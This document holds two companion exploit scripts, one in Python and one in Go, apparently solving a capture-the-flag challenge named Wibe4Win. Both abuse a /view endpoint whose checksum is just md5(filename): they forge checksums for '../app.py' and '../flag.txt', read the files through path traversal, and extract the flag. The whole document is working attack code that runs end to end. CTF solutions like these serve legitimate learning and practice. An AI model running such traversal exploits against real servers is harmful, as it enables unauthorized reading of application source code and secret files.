File: scripts_python/ACSC2026Qualification_Wibe4Win.py
#!/usr/bin/env python3
"""
ACSC Qualification 2026 - Wibe4Win

利用步骤：
1. 拉取首页并验证 snippet 链接中的 checksum 实际上就是 md5(file)
2. 利用 /view 的路径拼接问题读取 ../app.py
3. 读取 ../flag.txt 并提取 dach2026{...}

脚本只使用 Python 标准库。
"""

from __future__ import annotations

import argparse
import hashlib
import re
import sys
import urllib.parse
import urllib.request


DEFAULT_BASE = "https://be0s8cwbxaasof6s.dyn.acsc.land"


def fetch_text(url: str) -> str:
    with urllib.request.urlopen(url, timeout=15) as response:
        return response.read().decode("utf-8", errors="replace")


def read_via_view(base: str, filename: str) -> str:
    checksum = hashlib.md5(filename.encode()).hexdigest()
    url = f"{base}/view?file={urllib.parse.quote(filename, safe='/.')}&checksum={checksum}"
    return fetch_text(url)


def verify_homepage_checksums(base: str) -> None:
    html = fetch_text(f"{base}/")
    matches = re.findall(r"/view\?file=([^&]+)&checksum=([0-9a-f]{32})", html)
    if not matches:
        raise RuntimeError("首页中没有找到任何 snippet 链接")

    for raw_name, checksum in matches:
        name = urllib.parse.unquote(raw_name)
        expected = hashlib.md5(name.encode()).hexdigest()
        if checksum != expected:
            raise RuntimeError(f"snippet checksum mismatch: {name}")
    print(f"[+] verified {len(matches)} homepage snippet checksums")


def extract_flag(text: str) -> str:
    match = re.search(r"dach2026\{[^}]+\}", text)
    if not match:
        raise RuntimeError("未能在响应中提取 flag")
    return match.group(0)


def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit ACSC Qualification 2026 Wibe4Win")
    parser.add_argument("--base", default=DEFAULT_BASE, help="目标 URL，例如 https://host")
    args = parser.parse_args()

    base = args.base.rstrip("/")
    print(f"[+] target: {base}")

    verify_homepage_checksums(base)

    app_source = read_via_view(base, "../app.py")
    if "SNIPPETS_DIR" not in app_source or "flag.txt" not in app_source:
        raise RuntimeError("读取 ../app.py 失败，未找到预期源码特征")
    print("[+] ../app.py read succeeded")

    flag_text = read_via_view(base, "../flag.txt")
    flag = extract_flag(flag_text)
    print("[+] ../flag.txt read succeeded")
    print(flag)
    return 0


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except Exception as exc:
        print(f"[-] {exc}", file=sys.stderr)
        raise SystemExit(1)

File: scripts_go/ACSC2026Qualification_Wibe4Win.go
package main

import (
	"crypto/md5"
	"encoding/hex"
	"flag"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"regexp"
	"strings"
)

// ACSC Qualification 2026 - Wibe4Win
//
// 利用步骤：
//   1. 拉取首页，验证 snippet 链接中的 checksum = md5(file)
//   2. 构造 ../app.py 与 ../flag.txt 的 checksum
//   3. 通过 /view 读取应用源码与 flag
//
// 运行示例：
// go run CTF_Writeups/scripts_go/ACSC2026Qualification_Wibe4Win.go \
//   -base https://be0s8cwbxaasof6s.dyn.acsc.land

const defaultBaseURL = "https://be0s8cwbxaasof6s.dyn.acsc.land"

func md5Hex(text string) string {
	sum := md5.Sum([]byte(text))
	return hex.EncodeToString(sum[:])
}

func fetchText(client *http.Client, target string) (string, error) {
	resp, err := client.Get(target)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", err
	}
	return string(body), nil
}

func verifyHomepageChecksums(client *http.Client, base string) error {
	html, err := fetchText(client, base+"/")
	if err != nil {
		return err
	}

	re := regexp.MustCompile(`/view\?file=([^&]+)&checksum=([0-9a-f]{32})`)
	matches := re.FindAllStringSubmatch(html, -1)
	if len(matches) == 0 {
		return fmt.Errorf("no snippet links found on homepage")
	}

	for _, match := range matches {
		name, err := url.QueryUnescape(match[1])
		if err != nil {
			return err
		}
		checksum := match[2]
		if checksum != md5Hex(name) {
			return fmt.Errorf("checksum mismatch for %s", name)
		}
	}

	fmt.Printf("[+] verified %d homepage snippet checksums\n", len(matches))
	return nil
}

func readViaView(client *http.Client, base string, filename string) (string, error) {
	checksum := md5Hex(filename)
	target := fmt.Sprintf("%s/view?file=%s&checksum=%s", base, url.QueryEscape(filename), checksum)
	return fetchText(client, target)
}

func extractFlag(text string) (string, error) {
	re := regexp.MustCompile(`dach2026\{[^}]+\}`)
	flag := re.FindString(text)
	if flag == "" {
		return "", fmt.Errorf("flag not found")
	}
	return flag, nil
}

func main() {
	base := flag.String("base", defaultBaseURL, "target base URL")
	flag.Parse()

	client := &http.Client{}
	normalizedBase := strings.TrimRight(*base, "/")
	fmt.Printf("[+] target: %s\n", normalizedBase)

	if err := verifyHomepageChecksums(client, normalizedBase); err != nil {
		fmt.Fprintln(os.Stderr, "[-]", err)
		os.Exit(1)
	}

	appSource, err := readViaView(client, normalizedBase, "../app.py")
	if err != nil {
		fmt.Fprintln(os.Stderr, "[-]", err)
		os.Exit(1)
	}
	if !strings.Contains(appSource, "SNIPPETS_DIR") || !strings.Contains(appSource, "flag.txt") {
		fmt.Fprintln(os.Stderr, "[-] unexpected ../app.py response")
		os.Exit(1)
	}
	fmt.Println("[+] ../app.py read succeeded")

	flagText, err := readViaView(client, normalizedBase, "../flag.txt")
	if err != nil {
		fmt.Fprintln(os.Stderr, "[-]", err)
		os.Exit(1)
	}
	flagValue, err := extractFlag(flagText)
	if err != nil {
		fmt.Fprintln(os.Stderr, "[-]", err)
		os.Exit(1)
	}
	fmt.Println("[+] ../flag.txt read succeeded")
	fmt.Println(flagValue)
}
